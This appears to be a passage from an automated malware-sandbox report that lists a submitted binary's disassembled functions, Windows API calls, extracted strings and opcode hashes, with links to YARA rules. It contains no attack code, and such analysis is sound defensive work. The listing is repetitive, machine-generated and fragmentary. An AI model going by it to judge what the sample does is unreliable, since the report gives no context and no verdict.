                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: ObjectRelease$CapsDevice
                                    • String ID: (
                                    • API String ID: 1061551593-3887548279
                                    • Opcode ID: b0967b2cd69e94414b7da77159cc95add8037705eb4ea6f6323a1bf76cf923c0
                                    • Instruction ID: a074cb9c86a08f2041adf24185182f78409974941a0c6c2de5479487dc181e6d
                                    • Opcode Fuzzy Hash: b0967b2cd69e94414b7da77159cc95add8037705eb4ea6f6323a1bf76cf923c0
                                    • Instruction Fuzzy Hash: 42810371208614EFC715DF68D844E2ABBE9FF88705F00491DF98AD7260DB35AD09EB52
                                    Function 00350E37 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: _swprintf
                                    • String ID: %ls$%s: %s
                                    • API String ID: 589789837-2259941744
                                    • Opcode ID: 68cee13374991b7643c342416d9b2c9454f17137a61c60154dd03e01312f5e8b
                                    • Instruction ID: 3725607d4501db9557c7f9794ae67f3703e7ec8e9211bcbac8f0db83f8a16740
                                    • Opcode Fuzzy Hash: 68cee13374991b7643c342416d9b2c9454f17137a61c60154dd03e01312f5e8b
                                    • Instruction Fuzzy Hash: 7751B43118CB40F9EA371AA4CC07F3676ADAB08B03F304D06BEDA69CF5C69354586612
                                    Function 0036A918 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 0036AA84
                                      • Part of subcall function 00368849: IsProcessorFeaturePresent.KERNEL32(00000017,00368838,00000050,00373958,?,0034CFE0,00000004,00380EE8,?,?,00368845,00000000,00000000,00000000,00000000,00000000), ref: 0036884B
                                      • Part of subcall function 00368849: GetCurrentProcess.KERNEL32(C0000417,00373958,00000050,00380EE8), ref: 0036886D
                                      • Part of subcall function 00368849: TerminateProcess.KERNEL32(00000000), ref: 00368874
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                    • String ID: *?$.
                                    • API String ID: 2667617558-3972193922
                                    • Opcode ID: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
                                    • Instruction ID: a990e68c76bd2bf7cc3ff20a3b5531024780bd112f3a4828813fc44534cd699e
                                    • Opcode Fuzzy Hash: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
                                    • Instruction Fuzzy Hash: 5851BE71E0060AAFDF16CFA8C881AADB7F5EF48310F25816AE854EB344E6319E01CF51
                                    Function 0034772B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00347730
                                    • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 003478CC
                                      • Part of subcall function 0034A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0034A27A,?,?,?,0034A113,?,00000001,00000000,?,?), ref: 0034A458
                                      • Part of subcall function 0034A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0034A27A,?,?,?,0034A113,?,00000001,00000000,?,?), ref: 0034A489
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: File$Attributes$H_prologTime
                                    • String ID: :
                                    • API String ID: 1861295151-336475711
                                    • Opcode ID: 14117d29787a73ac6ff357dba12ca43fb75315eb43ca80ce5c653824de2c9606
                                    • Instruction ID: 542d1539a8c9118e83412754d096aa1e45203b60e252496695d9239a63c821d1
                                    • Opcode Fuzzy Hash: 14117d29787a73ac6ff357dba12ca43fb75315eb43ca80ce5c653824de2c9606
                                    • Instruction Fuzzy Hash: 40416571804158AADB26EB50DD46EEE77FCAF45300F0140DAB509AF192DB746F88CF61
                                    Function 0034B66C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: UNC$\\?\
                                    • API String ID: 0-253988292
                                    • Opcode ID: 67b2461a19443a3929905c14d27192dc8c85ea3b0cbeebf91072608e91733951
                                    • Instruction ID: 8d26ec72defabeace2536c54b028cd7c39366c1c03fd7a5ebe515e4733759954
                                    • Opcode Fuzzy Hash: 67b2461a19443a3929905c14d27192dc8c85ea3b0cbeebf91072608e91733951
                                    • Instruction Fuzzy Hash: FF41C535440259BACF23AF21CC41EEBBBEDAF41390F154425F954AF152D774FA84DA60
                                    Function 00354230 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 127COMMON
                                    Download Yara Rule
                                    APIs
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 003543D8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: Exception@8Throw
                                    • String ID: HC7$XC7
                                    • API String ID: 2005118841-1582499484
                                    • Opcode ID: d3c5ec99f969f6e1c4a1121fa3719b48652b859e6e24a6f98b603d60500a0691
                                    • Instruction ID: b1bc666ff58e6a9f8520eed21ffef62425d77f3f83e93285822fd5c673ded541
                                    • Opcode Fuzzy Hash: d3c5ec99f969f6e1c4a1121fa3719b48652b859e6e24a6f98b603d60500a0691
                                    • Instruction Fuzzy Hash: 76415E746007008BD329DF28D491FAAB7E5FF99304F05892DE89ACB261DB76E8588741
                                    Function 00358FB6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Shell.Explorer$about:blank
                                    • API String ID: 0-874089819
                                    • Opcode ID: 00a332f2c535062843d8b8337da87926af3dd0a230f5480f52045f788aa450bd
                                    • Instruction ID: cd018c305cd41165e08d648eada5bd593c5ca66e8900797480fc78886423f477
                                    • Opcode Fuzzy Hash: 00a332f2c535062843d8b8337da87926af3dd0a230f5480f52045f788aa450bd
                                    • Instruction Fuzzy Hash: D4217171604304DFCB1A9F64C895E2A77A8FF48712B15895EFC099F2A2DB70EC04CB60
                                    Function 0035D44D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON
                                    Download Yara Rule
                                    APIs
                                    • DialogBoxParamW.USER32(GETPASSWORD1,00010420,0035A990,?,?), ref: 0035D4C5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: DialogParam
                                    • String ID: GETPASSWORD1$xj9
                                    • API String ID: 665744214-104683938
                                    • Opcode ID: 327f2f0239677effbe0cf318566e85b1593ba320e9806ba7ff23e9618971113d
                                    • Instruction ID: 5bd63a94d80815815cf165ece61553b3192eafbe3c89f4272927de24e1090647
                                    • Opcode Fuzzy Hash: 327f2f0239677effbe0cf318566e85b1593ba320e9806ba7ff23e9618971113d
                                    • Instruction Fuzzy Hash: B61138726142486BDB33DE399C02FAB37DCB706312F0580A4FD49AB1A1CBB4AC489760
                                    Function 0034EBF2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0034EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0034EB92
                                      • Part of subcall function 0034EB73: GetProcAddress.KERNEL32(003881C0,CryptUnprotectMemory), ref: 0034EBA2
                                    • GetCurrentProcessId.KERNEL32(?,?,?,0034EBEC), ref: 0034EC84
                                    Strings
                                    • CryptProtectMemory failed, xrefs: 0034EC3B
                                    • CryptUnprotectMemory failed, xrefs: 0034EC7C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: AddressProc$CurrentProcess
                                    • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                    • API String ID: 2190909847-396321323
                                    • Opcode ID: 6b8af2f7d41ace0938ac6111b27c7ae5033fe5e557b453fc299883dcafd81c98
                                    • Instruction ID: 258a3a24a74d5ca720b132a37286ab072f744ce88ece4732c9048563cf8272e2
                                    • Opcode Fuzzy Hash: 6b8af2f7d41ace0938ac6111b27c7ae5033fe5e557b453fc299883dcafd81c98
                                    • Instruction Fuzzy Hash: C6112132A04224ABDB279B24DD86BAE3798FF00720B058059F8066F282CB35BE4197D1
                                    Function 00369B90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: _free
                                    • String ID: X7
                                    • API String ID: 269201875-1737092782
                                    • Opcode ID: 670d1b7e653f8644133398de48a319e1325acfebd94ed19d969899016fae76fb
                                    • Instruction ID: d69990ee55d0259e32b0ef38a2f790f928822008e1047021889efc8f0fa6fcc6
                                    • Opcode Fuzzy Hash: 670d1b7e653f8644133398de48a319e1325acfebd94ed19d969899016fae76fb
                                    • Instruction Fuzzy Hash: BD11C875A002119BEB239B38AC41B56379DA756730F158B27F522CF1D8E7B0C8424B80
                                    Function 0035EC4A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0035F25E
                                    • ___raise_securityfailure.LIBCMT ref: 0035F345
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: FeaturePresentProcessor___raise_securityfailure
                                    • String ID: 8:
                                    • API String ID: 3761405300-2795227845
                                    • Opcode ID: 8e5727778cd98c4634fd08fa1906799a00012946f3793be3068fa995412ffbea
                                    • Instruction ID: 09a769d61991df488c492c13f7fd7e15f8d6e471118c2ec2a1325052130bb85d
                                    • Opcode Fuzzy Hash: 8e5727778cd98c4634fd08fa1906799a00012946f3793be3068fa995412ffbea
                                    • Instruction Fuzzy Hash: BC21F5B9510704DBD72ADF64F981F507BE8BB5A310F10582AE9098B3B0E3B26984EF45
                                    Function 00350889 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateThread.KERNEL32(00000000,00010000,003509D0,?,00000000,00000000), ref: 003508AD
                                    • SetThreadPriority.KERNEL32(?,00000000), ref: 003508F4
                                      • Part of subcall function 00346E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00346EAF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: Thread$CreatePriority__vswprintf_c_l
                                    • String ID: CreateThread failed
                                    • API String ID: 2655393344-3849766595
                                    • Opcode ID: 9aaf88edd0433f989b5f5967a1939bc82bc74ba4e54dd975bedc8ac46e177446
                                    • Instruction ID: fcb742993c8dba7cfc2ac5b5072cfb1244e1d4fea8ca2189aa0041cb6bf6ccb8
                                    • Opcode Fuzzy Hash: 9aaf88edd0433f989b5f5967a1939bc82bc74ba4e54dd975bedc8ac46e177446
                                    • Instruction Fuzzy Hash: 33012BB52403056FD23A6F50EC42FA673D8EF00712F10042DFA8696090CEA278489760
                                    Function 0036B2AE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00368FA5: GetLastError.KERNEL32(?,00380EE8,00363E14,00380EE8,?,?,00363713,00000050,?,00380EE8,00000200), ref: 00368FA9
                                      • Part of subcall function 00368FA5: _free.LIBCMT ref: 00368FDC
                                      • Part of subcall function 00368FA5: SetLastError.KERNEL32(00000000,?,00380EE8,00000200), ref: 0036901D
                                      • Part of subcall function 00368FA5: _abort.LIBCMT ref: 00369023
                                    • _abort.LIBCMT ref: 0036B2E0
                                    • _free.LIBCMT ref: 0036B314
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: ErrorLast_abort_free
                                    • String ID: 7
                                    • API String ID: 289325740-2922071456
                                    • Opcode ID: 470ffefa990823d85d1a28a276e43fc8ab4e32a7c58b4672c9fb6c0d3b3847d2
                                    • Instruction ID: 778cc58eccfce6b6511b8bc966d45b5a0d75e5a7e51106ae820645d482892072
                                    • Opcode Fuzzy Hash: 470ffefa990823d85d1a28a276e43fc8ab4e32a7c58b4672c9fb6c0d3b3847d2
                                    • Instruction Fuzzy Hash: 00016536D016219FC7339F59480165DF7A4BB08B21F1A8549E964AB755CB306D81CFC5
                                    Function 0034130B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0034DA98: _swprintf.LIBCMT ref: 0034DABE
                                      • Part of subcall function 0034DA98: _strlen.LIBCMT ref: 0034DADF
                                      • Part of subcall function 0034DA98: SetDlgItemTextW.USER32(?,0037E154,?), ref: 0034DB3F
                                      • Part of subcall function 0034DA98: GetWindowRect.USER32(?,?), ref: 0034DB79
                                      • Part of subcall function 0034DA98: GetClientRect.USER32(?,?), ref: 0034DB85
                                    • GetDlgItem.USER32(00000000,00003021), ref: 0034134F
                                    • SetWindowTextW.USER32(00000000,003735B4), ref: 00341365
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                    • String ID: 0
                                    • API String ID: 2622349952-4108050209
                                    • Opcode ID: 493c86f5b6e10df23860ca1422fb0166dee928ad691e701b0160016947bf2825
                                    • Instruction ID: 2fac33d2a8ef4a17b8939aabed27547d581b970707a8cf7923f21c1e5e1a2a3b
                                    • Opcode Fuzzy Hash: 493c86f5b6e10df23860ca1422fb0166dee928ad691e701b0160016947bf2825
                                    • Instruction Fuzzy Hash: 8EF0873A10074CAADF2B1F608809BEA3BD8BF21305F098454FD5A589A1C778E9D5AF10
                                    Function 0035084E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                    Download Yara Rule
                                    APIs
                                    • WaitForSingleObject.KERNEL32(?,000000FF,00350A78,?), ref: 00350854
                                    • GetLastError.KERNEL32(?), ref: 00350860
                                      • Part of subcall function 00346E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00346EAF
                                    Strings
                                    • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00350869
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                    • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                    • API String ID: 1091760877-2248577382
                                    • Opcode ID: 75d5fb4c42cdf18b910bb8a1a2715ae7074071232ad5f6d30e8aefac0c58d491
                                    • Instruction ID: 770479445485eb5575d86e4eb678ec726ab020369c693e2a1f3548325ea6ac66
                                    • Opcode Fuzzy Hash: 75d5fb4c42cdf18b910bb8a1a2715ae7074071232ad5f6d30e8aefac0c58d491
                                    • Instruction Fuzzy Hash: A8D02E3190803062CA233B24AC0AEEF79489F02330F204B14F23E6E1F1DB22199482D2
                                    Function 0034DA4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000,?,0034D32F,?), ref: 0034DA53
                                    • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0034D32F,?), ref: 0034DA61
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1349698537.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                    • Associated: 00000000.00000002.1349680889.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349721451.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.0000000000384000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349736315.00000000003A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1349783375.00000000003A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_340000_adKGhCOOzg.jbxd
                                    Similarity
                                    • API ID: FindHandleModuleResource
                                    • String ID: RTL
                                    • API String ID: 3537982541-834975271
                                    • Opcode ID: 33b22773149a668a159348df656fe3728c1320ca1b336913a54615fff9bdeef6
                                    • Instruction ID: b62a4243eb34a8001111a1b13817ae2e8350f75069da80d7ee6b4f15043c44c8
                                    • Opcode Fuzzy Hash: 33b22773149a668a159348df656fe3728c1320ca1b336913a54615fff9bdeef6
                                    • Instruction Fuzzy Hash: C1C0123128535076D73217206C0DBC3698CAB11B11F05044DF24ADA1D0D6E5D980A651

                                    Executed Functions

                                    Function 00007FF887AD35F5 Relevance: 7.7, Strings: 6, Instructions: 195COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1513354716.00007FF887AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
